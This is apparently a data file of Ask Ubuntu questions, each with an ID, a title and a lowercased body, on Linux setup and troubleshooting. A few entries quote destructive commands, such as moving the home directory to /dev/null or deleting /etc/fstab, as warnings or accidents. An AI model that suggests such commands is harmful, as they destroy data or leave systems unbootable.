435820	mounting a share using cifs protocol from emc nas	is there a way so that when users create new files under a cifs mounted share the new files get the right ownership from the user who created the file instead of that user i used to mount the share . using following mount command in fstab //server/mntpoint /media/mntdir cifs credentials=/root/cifscreds1 , rw , uid=user , gid=group , file_mode=0600 , dir_mode=0770 , noperm , 0 0 using ubuntu 12.04.4 lts .
435825	can ubuntu trim another ( ntfs ) partition ?	i have three questions for ubuntu and trim/ssd experts . i 've got ssd drive ( sandisk sdssdp128g 128gb ) . currently , it is the only hard drive . connected via sata cable however in bios using ide mode rather than ahci . installed winxp sp2 on the first partition ( 16 gib , ntfs ) , and then aligned it to ssd blocks using gparted live cd installed ubuntu 12.04 lts on the second partition ( 16 gib , ext4 , immediately after the previous partition ) the rest of the drive is unpartitioned for now ; grub is used as os loader . ubuntu mounts the first ntfs partition on startup ( as done by ubuntu install , i have not touched that ) got confirmation from hdparm that drive supports trim enabled trim in ubuntu using `` fstrim / '' which runs by cron now , i spent weeks trying to get this info from the web . some sources say ntfs does support trim , others say win7 supports it ( while using ntfs ) . some sources say fstrim trims the whole physical drive while others say it only trims the current partition . is `` fstrim / '' in the scenario above applies to 16 gib ext4 partition only , or to the whole 128gb drive ? if it only applies to the ext4 partition , is it possible at all to trim the first ntfs partition ( from either ubuntu or winxp , but only using ubuntu native or win built-in tools , without dodgy software.com downloads ) ? could hdparm and moving/copying physical sectors do anything to help ? partition cloning whatever ? what is the worst-case scenario if trim is not possible for ntfs : are there any firmware garbage collectors that could do similar thing without os commands ? please do not recommend switching to win 7 whatsoever - i 'm still happy with the development environment under win xp . i 'm still happy to use `` out-of-date '' os if it boots in 7 seconds , gives immediate response to anything you do , and loads photoshop in 3 seconds ( for the first run : ) thank you in advance , yaroslav
435830	convert rpm file to iso file	i want to download an os . i have two options : either downloading iso file directly via remote link . or downloading rpm package via bittorrent i want to download via bittorrent . however , i want to get an iso file . the issue is how to convert this rpm package to iso image file .
435832	recover deleted log files	i know that ubuntu saves logs and rotates them overwriting older syslog.gz files . is it possible to recover overwritten logs ? perhaps with a specific software .
435839	how to know what version of php is used on my xampp ?	i am using xampp on my ubuntu os . and i need to know what version of php my xampp is using . how do i do that ?
435850	ubuntu 13.10 gnome flashback theme	i would like to change colors in ubuntu flashback theme . i need to know if flashback uses gtk3 theme files or metacity files in theme folder . thank you
435851	moving a file or directory to /dev/null	i am going to move a directory and a file to /dev/null . what will happen if i move a file to /dev/null and what will happen if i move a directory to /dev/null ?
435854	problem in installing/uninstalling wubi	i tried to install ubuntu by wubi file but while installing my computer lost power supply so again i tried to install now it is asking to uninstall previous installation but if i choose option to uninstall it is showing permission denied error some log file . please let me know how to proceed for installation ? thank you
435858	ldap server in ubuntu 12.04	i need an easy step by step tutorial to install and configure openldap server . please help ! i 'm using ubuntu 12.04 . the official documentation is complicated . i need a gui application if there is a one .
435859	evolution 3.10.3 + ews + office365 = calendar hangs client	i upgraded from ubuntu 13.04 to ubuntu 13.10 . i also updated evolution from 3.8 to gnome ppa 3.10 . my calendar is no longer accessible in evolution . when i go to the calendar ( i.e . press the calendar button ) the screen switches to calendar and then the evolution client hangs . it 's no longer responsive . i have to kill all the evolution processes , restart the client and quickly click the mail button . funny thing is though , i still get calendar reminders from evolution . i just ca n't seem to manage my calendar in evolution . i have tried to delete my ews account and reconfigure it but to no avail . i have done the export camel_case= '' all '' command and ran evolution from the command line . when i switch to the calendar no debug information comes forth - the client just hangs . is there something else i should try ?
435861	what is the difference between /dev/tty* and /dev/bus/usb/001/002 ?	when i plug in a device that uses the lufa usb framework ( or any usb < - > serial peripheral ) , ubuntu creates a /dev/ttyacm* device file . it also creates a /dev/bus/usb/001/002 file and a /sys/bus/usb/devices/usb1/1-1/1-1.3/1-1.3.1/ tree . what are the differences between these ? i ask because i am using pyudev , which provides device nodes such as the /dev/bus/ ... example , but i do n't know if this is different to the tty . is it ?
435864	what is the sudo -i command	what does the sudo -i command do and in which situations would it be used . read it using the man sudo command but i 'm looking for a more diluted discription to help me understand better .
435866	why is moving directories to /dev/null dangerous ?	when trying to move a test_dir directory to /dev/null , i get the message mv : can not overwrite non-directory ‘/dev/null’ with directory ‘test_dir/’ then why do people say `` do n't run the command sudo mv ~ /dev/null , it will move your home directory to a hole ? '' link but /home is also a directory .
435867	python photometry tools	anybody has experience with photometry ? i am trying to use ppt ( python photometric toolbox ) with no success . i have two branching questions : anybody can suggest a working photometry solution running under saucy salamander or is here an experienced python guru to help to interpret why is this message : file `` /usr/lib/python2.7/subprocess.py '' , line 522 , in call return popen ( *popenargs , **kwargs ) .wait ( ) file `` /usr/lib/python2.7/subprocess.py '' , line 709 , in __init__ errread , errwrite ) file `` /usr/lib/python2.7/subprocess.py '' , line 1326 , in _execute_child raise child_exception oserror : [ errno 8 ] exec format error
435869	non-root users to shutdown using pam	i want to configure pam to enable non-root normal users to be able to shutdown . how to do that ? i 'm using ubuntu server 12.04 i know how to do that with many ways such as changing permissions of the binary or adding exceptions in the sudeors ... . i do n't want to change permissions i do n't know to configure policykit i do n't want to give permissions from sudeors i need only to learn how to do it by confiuring pam not any onther method
435871	install spectrum3d on ubuntu	i want to install a spectral analysis tool for ubuntu , and thought spectrum3d looked good . i 've tried following the install instructions . as far as i understand , i am supposed to write : sudo add-apt-repository ppa : nadaeck/spectrum3d in the terminal . it does n't work . i get the following error message : traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 128 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 84 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 7 , `` could n't connect to host '' ) from my rudimentary understanding of linux , i should be able to write my sudo password here , but the characters i write are shown in cleartext . it never asks for my password when this did n't work , i tried to download it from sourceforge and compile it , i also tried searching for it in the ubuntu software centre , but i could n't find it . i downloaded the latest version and went to the folder and typed : ./configure ; make ; make install i got the following output : checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for style of include used by make ... gnu checking dependency style of gcc ... gcc3 checking whether gcc and cc understand -c and -o together ... yes checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for gtk3 ... no checking for gtk2 ... no configure : error : gtk library ( libgtk-2.0 or libgtk-3.0 ) is required make : *** no targets specified and no makefile found . stop . make : *** no rule to make target `install ' . stop . so , how do i just get this program up and running on my system ?
435875	ubuntu apps development - how to communicate betwen 2 pages	on one page i have displayed listview and on child page i creating new records . when the child page is closed i would like to refresh the listview . is there some signel which inform me when page get focus or something simmilar ? it 's done in qml using the page from ubuntu.components .
435878	how to extract xyz.arc file in ubuntu ?	how to extract a .acr file in ubuntu . ubuntu version 12.04 please help .
435887	i can read from /dev/null ; how to fix it ?	i read the wikipedia article on /dev/null and was playing around by moving files to /dev/null . for this i created a test_file and put some contents in it : $ touch test_file $ echo `` this is written by aditya '' > test_file $ cat test_file this is written by aditya thereafter i tried to move the file to /dev/null : $ mv test_file /dev/null mv : inter-device move failed : ‘test_file’ to ‘/dev/null’ ; unable to remove target : permission denied since , this gave me a permission denied error ; i went ahead and used sudo as i normally do whenever i encounter a permission denied error . $ sudo mv test_file /dev/null the command succeeded and test_file is no longer present in the directory . however , the wikipedia article says that it is not possible to recover anything moved to /dev/null and it gives an eof to any process that tries to read from it . but , i can read from /dev/null : $ cat /dev/null this is written by aditya what did i do wrong and how do i fix /dev/null back to normal ? and why did i encounter permission denied error in the first place ?
435889	installation on usb	using universal usb installer 1.9.5.2. setup the screen states installation done , process is completed . however an error message states i could n't find a configuration file.unbutu 12.04.4 desktop i386 is not supported . how do i fix this ? i used my msi u100 notebook with processor atom n270 1.60 ghz , and a memory stick patriot xt 16gb . checking the memory stick i find no new content added . if i install unbutu directly on my computer -- does it remove my windows xp or can i switch between them ?
435894	shortcut to change the gnome-terminal font size	i need fast shortcut to change the terminal font size . i use gnome-terminal . i tried with ctrl + + and ctrl + - but the size is not changed . is there another shortcut ? can i add a shortcut like this ?
435897	netatalk authorizing with windows active directory clients	we have an ubuntu server that we intend to use to share videos and other content over afp to our client macs . afp works flawlessly by setting the allow list to one single user . the problem arises when we wish to make use of other users in our windows active directory . my /etc/netatalk/applevolumes.default file looks like this : ~/videos `` videos '' allow : @ staff-linux , computeradmin allowed_hosts:192.168.10.0/24,192.168.40.0/24 options : upriv , usedots ( computeradmin is a local user on the machine , they can connect to the afp share ) . we have added the ubuntu server into the active directory domain using likewise open , and users can log in with their usernames via ssh . how can we allow all the users in the 'staff-linux ' active directory group to connect to this share ? thanks in advance .
435898	second monitor not recognised in display , only clones display from 1st monitor to 2nd	i 'm trying to extend my display , however it 's not working exactly like i want it to . it merely clones the display from the first monitor onto the second monitor . when i look into `` screen display '' settings it only shows as having one monitor connected ( it also calls it `` built in display '' ) . i have tried using the drivers from amd 's website and that borked my os so i had to re-install everything and i tried fglrx but my gpu is n't being recognised . i 've not had much luck finding information about this on my own so now i 'm asking for help from others i have an msi gaming edition r9 290 gpu . my motherboard is the itx asus impact ( disabled the on board gpu ) . cpu is i5 4670k . edit : the output of xandr -q xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1680 x 1050 , maximum 1680 x 1050 default connected primary 1680x1050+0+0 0mm x 0mm 1680x1050 0.0* 1280x1024 0.0 1280x960 0.0 1024x768 0.0 800x600 0.0 640x480 0.0
435899	using thunderbird to automatically backup my email account	i use thunderbird to backup my web-based email account : i open thunderbird and copy the mail messages from the inbox to a local folder . is there a way to do this automatically every day , so that i do n't have to open thunderbird all the time ? edit : gmvault is very useful for gmail accounts . for non-gmail account , the getmail method should probably be used .
435900	what does the question mark in terminal command mean ?	this question ( how can i remove gnome from a kubuntu 12.04 install ? ) have the commands with question markes : sudo apt-get remove -- purge ubuntu-desktop sudo apt-get remove -- purge unity ? sudo apt-get remove -- purge gnome ? what do the question mark mean ?
435905	how to add the toshiba e-studio 211 mfp to ubuntu 13.10	my toshiba e-studio 211 mfp is plugged in by usb , but it can not be automatically recognized by the system . and it is neither in the list of supported printers of the openprinting group nor in the wordcraft list of supported mfps . how can i make it at least print ?
435906	ubuntu 13.10 - i am running in kiosk train station public place , but this autoupdate window is annoying every day . how to remove it please ?	i need to remove this auto update notification dialog window which is very annoying and scary for public location where people is clicking the system and breaking it down to crash every day . i tried to remove the autoupdate notification window with following , but still every single day its showing in the screen and its very annoying like ubuntu virus , very disturbing and not respecting privacy , such as i do not want it to ever show , but it keeps showing by force . try : sudo sed -i 's/nodisplay=true/nodisplay=false/g ' /etc/xdg/autostart/*.desktop try : apt-get install dconf-editor export display=:0.0 & & dconf-editor via gui > go to com- > ubuntu- > update-notifer- > no-show-notifications and enable it try : disable auto uploader $ comment outall /etc/apt/apt.conf.d/50unattended-upgrades $ add new line /etc/apt/apt.conf.d/10periodic apt : :periodic : :unattended-upgrade `` 0 '' ; but still the auto-update notification dialog window appears . i am unable to remove it for completely .
435909	windows boot on 2nd hard disc drive	i have ventured into the ubunta world . i decided to completely ditch windows so i did n't do a windows and ubuntu install but just installed ubuntu 12.04 . because i ca n't sync my iphone i have installed a second hdd with xp on it ? how do i get the option to boot xp . i seem to only be able to find answers with windows on hdd1 and ubuntu on hdd2
435911	can i set internet usage quota in squid on ubuntu 12.04	i want to set internet usage quota in squid on ubuntu 12.04 . please suggest me the squid policy for set internet usage quotas . thanks in advance rakesh
435919	installation problem from cd and usb	i downloaded the ubuntu-13.10-desktop-1386.iso file twice already , first i installed it on a usb stick installation did not work ... than i burned it onto a cd/dvd did not work.. i get to the point where it asks me on which drive and i choose my disk not the one with windows xp on the other one which i formatted it is around 260gb totally empty , i choose my user name and password and than it starts as it say to install but after hours of downloading and `` installing '' it gives me an error message need help as i would like to join the ubuntu community ...
435920	blank screen without controls after installation	recently installed ubuntu 13.10 on my dell dimension 2400 desktop . it seemed to install ok . but it loads to a blank desktop screen with no controls . not even close or minimize buttons . even right-click does n't give control options . this is frightening .
435923	need assistance setting up wired internet on ubuntu sacy ( 13.10 )	im on a state internet and i need a need assistance setting up my ip . on windows 7 it was easy . but on ubuntu it is a a bit difficult . my school use alt dns as well as dns and my ip never changes but i have to enter it into a field but i do n't know where it uses subnet and default gateway how would i enter it please help and thank you please contact if you need additional information
435927	ndiswrapper error	i am trying to install ndiswrapper with the command sudo apt-get install ndiswrapper and i get the `` unable to locate package '' error . i run ubuntu 12.10 and i do not have an internet connection atm on that laptop . i have downloaded the ndiswrapper package , which is in /home/x/downloads/ . please help , thank you .
435928	installing juju client on windows 8.1	not sure if i am missing something pretty simple here but when i download the juju windows client and i try run it all i get is `` this app can not run on your pc '' . it seems that it should be a straight forward install but i do not seem to be able to get past this . thanks
435933	how to change about this computer in ubuntu 13.10	i am trying to create a my own custom linux distribution for my self and i dont know how to change the os name . i am using remastersys ( got it working somehow ) is it possible to change the name in remastersys . one last thing how to change the ubuntu logo everywhere ( leaving the plymouth ) . please help me ! ! ! ! ! !
435934	sending enter in interaction mode ubuntu 13.10	i 'm trying to make a basic script for deployment of ocs-inventory and i got stuck on a problem . when i issue this command : sudo apt-get install -y ocsinventory-agent the interactive window appears . the only thing i need to do is press enter . it 's the same type of graphic prompt which you get when you are installing kerberos5 . is there any possibility to include the `` enter '' in script ?
435938	second hdd from windows as backup	so i 'm migrating back to ubuntu after a long struggle with windows specific applications for my college work . my problem is , i now have two hard drives in my laptop , an ssd and a mechanical one . i plan to install ubuntu on my ssd ( not dual boot with windows ) while my mechanical hdd would serve as a backup storage for my residual files from my windows . can my mechanical hdd then be accessible when i go into ubuntu after the install ? or do i need to change the filesystem and what not ?
435940	do i need linux drivers for virtual box ?	i have recently fallen in love with linux . i first decided to try out ubuntu 13.10 a few weeks ago , but i bricked it by incorrectly installing an amd fglrx driver . then i reformatted and wiped that partition to try out linux mint 16 . i did the same thing with mint , as well as with fedora 20 , 19 , and 18 ( in that order ) . now i am on a stable ubuntu 12.04 because i know how to use it vastly more than the other distros i 've tried and because it seems like it has the biggest online support group . because i am now tired of reformatting and reinstalling broken distros , i thought it would be a good idea to get at least one distro stable ( precise ) and to test the driver installations and other risky modifications for that distro and others with them running in oracle virtual box since i do n't trust my linux skill ( lack ? ) at the moment . this way , i optimize the distros in the box , take a `` snapshot '' like saving a video game , and try out the risky operations . if they fail and i break the distro , i can just open the snapshot up and go back to where i was right before the risky operation . while this still seems like the best idea so far , i have noticed that the distros i have installed on virtual box report that i am not using my computer 's actual hardware , and am actually using virtual box 's `` hardware '' , for instance , the `` innotek systemberatung gmbh virtualbox graphics adapter . because of that adapter , my test graphics installations do not work properly . even the operations i know would brick the distro with a black screen are not working . `` my adapter is incompatible , '' fglrx installation says , in the gui version of installation ( one of many methods ) . my questions are : can i not install these drivers inside of virtual box ? do i need some additional software ? is there any other virtual environment i could use for testing these distros that would result in a 100 % identical virtual installation ? i am using the notoriously linux-unfriendly acer aspire 5553g , which has `` switchable graphics '' . those cards are the mobility radeon hd 4250 and 5470 . the driver 's i have tested so far work in windows 7 , yet do not in linux . thank you all in advance !
435941	firefox renders wrong colors	i 've got the following problem : i 'm developing an website , so while i was testing around i 've noticed that firefox and chromium display an css bar in different colors . when i switched between several machine i could come to the conclusion that firefox for ubuntu is the problem . on all other devices i 've tested the website . it 's perfectly fine . does someone knows why this is and came up with a solution ?
435943	ca n't move windows vertically with crtl+alt+shift in 13.10 ?	i am using multiple desktops . i can move windows horizontally from one desktop to another using the ctrl+alt+shift method . however , i am unable to move windows vertically from one window to another . any idea how to fix this so that i can move windows vertically from one desktop to another ? i am on a lenovo y410p using 13.10 64-bit .
435947	unable to install rhipe package for r version 3.0.2 in ubuntu-12.04	i have ubuntu 12.04 os with r 3.0.2 version . my problem is i am getting message like `` rhipe packages is not available for r version 3.0.2 '' . please let me know in case you have a workaround or any solution for installing rhipe in r 3.0.2 ( for ubuntu ) . regards ,
435951	unity wo n't boot	my ubuntu is not starting correctly . i see the bios splash screen followed by a purple background , then some lines of text on a black background : [ 1.071536 ] ata6.00 : failed to enable aa ( error_mask=0x1 ) [ 1.077947 ] ata6.00 : failed to enable aa ( error_mask=0x1 ) [ 7.750524 ] ideapad_laptop : timeout in write_ec_cmd [ 7.054609 ] ideapad_laptop : timeout in write_ec_cmd [ 9.636042 ] ideapad_laptop : timeout in write_ec_cmd after which i see the ubuntu logo above the loading dots , but then quickly flash to a black screen . sometimes this black screen that comes up will have a solid cursor , other times it is just black . before it said `` can not complete bytes : broken pipe , '' though it has n't done so in a few boot-ups . i can only assume it 's because the nvidia persistence daemon no longer fails . i have no idea what to do . could you please help me fix my ubuntu start up ?
435953	uptart and gnokii and chroot	i try to run this upstart script . # description `` '' author `` '' start on runlevel [ 2345 ] stop on runlevel [ ! 2345 ] # chroot /home/ubuntu/ respawn respawn limit 1 1 exec sudo smsd -u cable -p akses -d cab -c localhost -m mysql -b sm -f /var/log/smsdaemon.log but smsd used to find configuration in my home folder . and when i uncomment chroot ( where is config ) part it fails : start : job failed to start
435954	what is the equivalent of locales-all from debian ?	on debian , i can have a package depend on locales-all to ensure that all locales are installed/available . there is no such package in ubuntu . it used to have belocs-locales-* which appeared to do the same ; alternatively , one could depend on various localisation packs ( e.g . just de+en+fr for most of western europe , which is of limited use ; sometimes , software does in fact require all standard locales ) . these packages disappeared between hardy and precise , afaict . so , what ubuntu package can i depends on to have all locales available ? edit : this is not the same as the locales package , which merely provides data files needed to generate the locales ; merely installing the locales-all package in debian makes those locales available immediately , and all of them . ( it contains a pack , in recent versions , saving much space too . ) this way , the user does not have a knob in which they can ( accidentally ) disable necessary locales .
435955	how to restore the launcher on left and top edges	i am using ubuntu 12.04 lts and am a newbie . i restarted my pc and on restart it has come up but with no launcher on left edge and top of the window . can you help me with the solution ? #
435958	completely black screen after disconnecting external display except when booting in recovery mode	when trying to connect an external screen ( video projector ) to my laptop ( dell latitude e6530 ) , i tried to switch to the external display using settings manager - > display . i changed a setting , but i do n't remember exactly which . then , both screens went blank . since then , after booting and logging in to gdm , the display is completely black . i am able to switch to the text console and applications appear to be running . the ubuntu wiki blank screen troubleshooting page states that : if it occurs after entering your password on the login page , you have some different class of issue , such as an issue with 3d / drm . try disabling compiz ( sudo chmod a-x /usr/bin/compiz ) , logging in as a different user , or turning off dri . i am not using compiz . i am able to log in as a guest user . no file in /usr/share/x11/xorg.conf.d has a recent modification date . i am able to log in successfully in recovery mode , although i get once again a blank screen if i resume from suspension . unlike other problems reporting blank screens after login ( 1 , 2 , 3 , 4 , 5 ) , i have no mouse cursor . when in recovery mode , i ca n't change any settings through system manager - > display . how do i repair my `` normal boot '' display configuration ? evidently nothing was changed in /usr/share/x11/xorg.conf.d ; where else should i search ? what can i look for to investigate the cause in more detail ?
435960	recent update issue	i updated my ubuntu 12.04 server yesterday with the latest updates and now when ubuntu starts it is in a really strange state . a purple screen comes up but there are no unity icons and i ca n't really do anything , there are no errors that i can detect . i 've never really had any issues like this with ubuntu so i 'm a bit unsure how to get it resolved , my linux commannd line knowlege is somewhat limited so any details would be greatly appreciated in attempting to debug . is there any way to rollback recent updates ? does anyone have any suggestions for troubleshoting or have any ideas on what could be the issue ? any help or suggestions would be greatly appreciated . thanks .
435961	can wlan0 & wlan1 both be active at the same time or will they interfere with each other ?	i recently installed lubuntu on an hp pavilion which had previously been running windows xp . the internal broadcom wireless card was experiencing some drop off issues & is under lubuntu as well . stuck a new ralink external wireless adapter into the the usb port & now the wireless is working very well . uninstalled the b43 firmware so the bcm4306 card wo n't work but it still shows up under the wireless device list as wlan0 along with the ralink adapter which is wlan1 . not very good with linux so not sure if there 's a `` device manager '' or the like to disable the broadcom card . will it hurt to leave both wlan0 & wlan1 active even tho wlan0 will never be used ? or can someone help me disable the internal broadcom card ? found this command = `` sudo ifconfig wlan0 down '' but i 'm not really sure what i 'm doing here . does this command only bring wlan0 down for the current session & will wlan0 then reappear after the next restart ? thanks
435964	sound from u12.04 via hdmi to rca 32 '' tv	hope you can help out on this one . i just installed u-12.04 on my hp probook dual processor and one of the issues that i am having is that whenever i hook up my rca 32 '' tv via the hdmi port ; the sound comes out sounding like everyone is speaking in a helium environment . just like whenever you breath in helium out of balloon and you sound funny , well this is how the tv sounds but it is n't too funny . sound coming out of laptop is fine . sound coming out of tv via cable & ps3 is fine . sound coming out of windows 7 was fine as well , but i do n't like windows . suggestions anyone ? ? ? thank you ...
435965	accidentally deleted /etc/fstab file	i accidentally deleted my /etc/fstab file by running sudo rm /etc/fstab.without knowing this , i shutdowned my ubuntu os . now i ca n't be able to boot into my os . my screen look like this.in some cases , a purple screen appears.please give me some solutions .
435967	unable to change 64bit architecture to 32 bit architecture while using dpkg command	i am using ubuntu 12.04 64 bit architecture . i want to install skype in order to do this first i need to convert 64 to 32 bit architecture.. so i type the command sudo dpkg -- add-architecture i386 and it not working.. and showing like this ... ( satyam @ satyam-vostro : ~ $ sudo dpkg -- add-architecture i386 [ sudo ] password for satyam : dpkg : error : unknown option -- add-architecture type dpkg -- help for help about installing and deinstalling packages [ * ] ; use `dselect ' or `aptitude ' for user-friendly package management ; type dpkg -dhelp for a list of dpkg debug flag values ; type dpkg -- force-help for a list of forcing options ; type dpkg-deb -- help for help about manipulating *.deb files ; options marked [ * ] produce a lot of output - pipe it through less ' ormore ' ! ) plz help me out to fix this problem ...
435978	ubuntu touch boot app does not work	just installed the latest dual boot touch on my nexus 4. everything seems to work , except the dual boot app on ubuntu touch . it freezes , if i hit `` reboot to x '' . any help ?
435979	brightness issues on hp pavilion 15-n042se notebook pc	i have installed ubuntu 12.04 lts , i found that i ca n't control the display brightness with the hotkeys ( f2 and f3 ) or even from gui ( brightness and lock screen ) , i do n't have any control on the brightness . i have searched for long time and i have tried many solutions , with no change in the issue status . solutions that i tried : i changed the file /etc/default/grub with one of the following suggestions : grub_cmdline_linux_default= '' acpi_backlight=vendor '' grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' grub_cmdline_linux= '' acpi_backlight=vendor '' grub_cmdline_linux= '' acpi_backlight=linux '' by run update-grub and reboot the machine after each change . also i added this line : echo 2 > /sys/class/backlight/acpi_video0/brightness to the file : /etc/rc.local to control the brightness but it does n't work too . here is some data could help on solving my problem : lspci | grep vga 00:02.0 vga compatible controller : intel corporation device 0a16 ( rev 09 ) cat /proc/cmdline boot_image=/boot/vmlinuz-3.2.0-23-generic root=uuid=06ab0d93-ca49-4390-8135-78d25b50a3cc ro acpi_backlight=vendor quiet splash check this thread , with no results .
435981	viewing custom attributes of a file within nautilus	within nautilus i can right-click a file and view the file properties . i want to set custom file properties myself . linux attr would do . so first i installed the attr : sudo apt-get install attr then i created a test-1.txt file . and assigned attributes with : setfattr -n user.testing -v `` this is a test '' test-1.txt to read the attributes i use : getfattr -n user.testing test-1.txt so i can write and read my custom file attributes ( properties ) . the origin source of this example is on : http : //archive09.linux.com/feature/114027 but these properties are not visible in nautilus . how can i make my custom properties visible in nautilus ? i copied the test-1.txt file to a windows 8 system and checked the properties . also on the windows 8 system these properties are not visible . so it might be attr itself , which does not set the properties which are 'readable ' by file managers . i know sometimes properties get lost when copied , so the problem might also be coming from here .
435982	how to find `` only '' ip addresses in a local area network	sudo arp-scan -- interface=eth0 -- localnet i know the above command works fine but it outputs everything like mac address etc , etc . but i need to find only ip addresses . is it possible ?
435987	why auto complete does not work for directories in terminal ?	i am using ubuntu 13.10 . while i was using previous versions of ubuntu , i was able to auto-complete the directories names , even multiple times in a single command . i am not able to the same now . as shown in screen-shot , i am writing this command and then i press tab . but nothing happens , while i am having a directory at that level , named 'addons ' . can i have solution for this problem i am facing ? thanks .
435988	ubuntu on a gigatbye brix pro ?	are there any one in here that has tried to install ubuntu on a gigabyte brix pro ? i think it is the same as the steam box that comes later this year
435992	setting up a firewall ubuntu server 13.10 to specified domain users of a windows server 2008	so , here 's the plan : i want to set up a firewall that allows/blocks certain websites for specified users in a windows server domain ( local ) ; for example : for the user domain.name/user1 i want to block access to facebook.com and allow the other websites ; for the user domain.name/user2 i want to block every website and only allow google.com here 's the hardware set up : motherboard : asus p5kpl-am-se cpu : intel core 2 duo e7560 ram : 2 gb ddr2 hdd : maxtor 20 gb ide ethernet0 : realtek 10/100mbps ( onboard lan ) ethernet1 : d-link 10/100mbps the machine is running ubuntu server 13.10 x64 . the desired connections map is : isp - internet router connecting to eth0 -- - > `` firewalled pc using ubuntu server '' -- -- > eth1 -- - > ethernet switch -- -- > windows server domain and users
435996	how can i remove an entry from a list in a shells script ?	i have the following script : # ! /bin/bash # bash menu script example ps3='please enter your choice : ' options= ( `` option 1 '' `` option 2 '' `` option 3 '' `` quit '' ) select opt in `` $ { options [ @ ] } '' do case $ opt in `` option 1 '' ) echo `` you chose choice 1 '' ; ; `` option 2 '' ) echo `` you chose choice 2 '' ; ; `` option 3 '' ) echo `` you chose choice 3 '' ; ; `` quit '' ) break ; ; * ) echo invalid option ; ; esac done my problem is that i do n't know how to remove a choice from the list after it has been selected . is that possible ? how ?
435997	how can one change login screen resolution with propreitary graphic driver installed ?	i installed the latest amd beta driver from this site . the installation was perfect . but now i am not able to see my login screen ( where you type your password , as you know ) . my monitor displays `` out of range '' when i am on my login screen . but i can type in my password and enter into my desktop without any problem . probably the login screen resolution is beyond the resolution of my monitor . if that is the case , then how can i change the resolution of the login screen alone ? ( btw , my graphic card is ati radeon 5570 hd . i have dell monitor with maximum resolution of 1366x768 . also i can view my desktop without problems . ) ps : - this question is very much similar to this question . but none of the solutions solve the problem in 14.04 which i am using . note that the problem stated above was also present in ubuntu 13.10 .
436005	ca n't apply partition table on pen drive and create partition	i have pen drive that shows unloacted.i have tried many tools as gparted , fdisk , gpart , testdisk etc . but i ca n't make it usable . here is my test results : fdisk : $ sudo fdisk -l ... . disk /dev/sdc : 8010 mb , 8010194944 bytes 247 heads , 62 sectors/track , 1021 cylinders , total 15644912 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd0e2392f disk /dev/sdc does n't contain a valid partition table so this device size is correctly identified as 8010mb ( 8gb ) and is located at /dev/sdc . interestingly , fdisk has reported that this device is not having a valid partition table . so something has happened to the partition table and i wanted to fix it with the help of fdisk command as follows $ sudo fdisk /dev/sdc device contains neither a valid dos partition table , nor sun , sgi or osf disklabel building a new dos disklabel with disk identifier 0x4c9b7827 . changes will remain in memory only , until you decide to write them . after that , of course , the previous content wo n't be recoverable . warning : invalid flag 0x0000 of partition table 4 will be corrected by w ( rite ) command ( m for help ) : w the partition table has been altered ! calling ioctl ( ) to re-read partition table then i have tried to partition the pendrive # sudo fdisk /dev/sdc ... warning : invalid flag 0x0000 of partition table 4 will be corrected by w ( rite ) command ( m for help ) : n partition type : primary ( 0 primary , 0 extended , 4 free ) extended select ( default p ) : p partition number ( 1-4 , default 1 ) : 1 first sector ( 2048-15644911 , default 2048 ) : using default value 2048 last sector , +sectors or +size { k , m , g } ( 2048-15644911 , default 15644911 ) : using default value 15644911 command ( m for help ) : w the partition table has been altered ! calling ioctl ( ) to re-read partition after doing this my pen drive still unlocated.then i try to solve using gparted . gparted results : i used `` gparted '' tool to add a partition table . as shown in above image , gparted shows this device at /dev/sdc with partition=unallocated and filesystem=unallocated , so it also identified that there was an issue . so i tried adding a partition table [ by device - > create partition table ... ] of msdos type , but gui displayed an error message as `` error while creating partition table '' . command line also had some issues listed as below $ sudo gparted ====================== libparted : 3.1 ====================== /dev/sdc : unrecognised disk label /dev/sdc : unrecognised disk label now how can i solve the problem . thanks in advance .
436009	booting a real physical win7 installation as xen guest	so far i have achieved booting a physical installation of win7 on internal hdd from ubuntu usb hdd in both kvm and vb/vmware virtual machines using raw disk access . windows runs without any amendments to the partition , and it also can boot as normal windows machine when the ubuntu usb is disconnected . now i installed xen and successfully run ubuntu as dom0 . i want to boot the physical windows partition as domu without modifying it . can xen use raw disk partition to boot from it without converting ? i want to keep the ability of booting in windows natively when ubuntu hdd is not present , and enjoy bare metal features through xen . how do i create such guest in xen ? thanks .
436014	updated from ubuntu 12.04 lts wubi to 13.10 , ethernet connection now flaky	under ubuntu 12.04 lts , i would , whenever i wanted to connect a different computer to the internet , unplug the ethernet cable and plug it into the other computer . when i wanted to use ubuntu again , i would plug the cable back into the ubuntu machine . the network applet would easily negotiate a new connection , even after several days of being disconnected . i upgraded to ubuntu 13.10 because some kind of malware infected 12.04 , do n't know how . in any case , if i unplug it for more than 5 minutes or so , i can no longer switch the ethernet cable between computers without losing the ethernet connection on the 13.10 machine . when the connection is working , the networking applet ( top toolbar ) shows : [ dimmed ] ethernet network ethernet connection 1 disconnect vpn connections [ checked ] enable networking connection information edit connections ... if i unplug the cable , after a few minutes several of the above entries disappear or get dimmed out : [ dimmed ] ethernet network [ dimmed ] disconnect enable networking [ dimmed ] connection information edit connections ... if i click enable networking it has no effect : ca n't get a connection . if i click edit connections , then delete/add ethernet connection on eth0 , it still does n't work . i tried ifup and ifdown to no effect . the only way to get back online is to re-boot . surely there is a better way . any help would be appreciated .
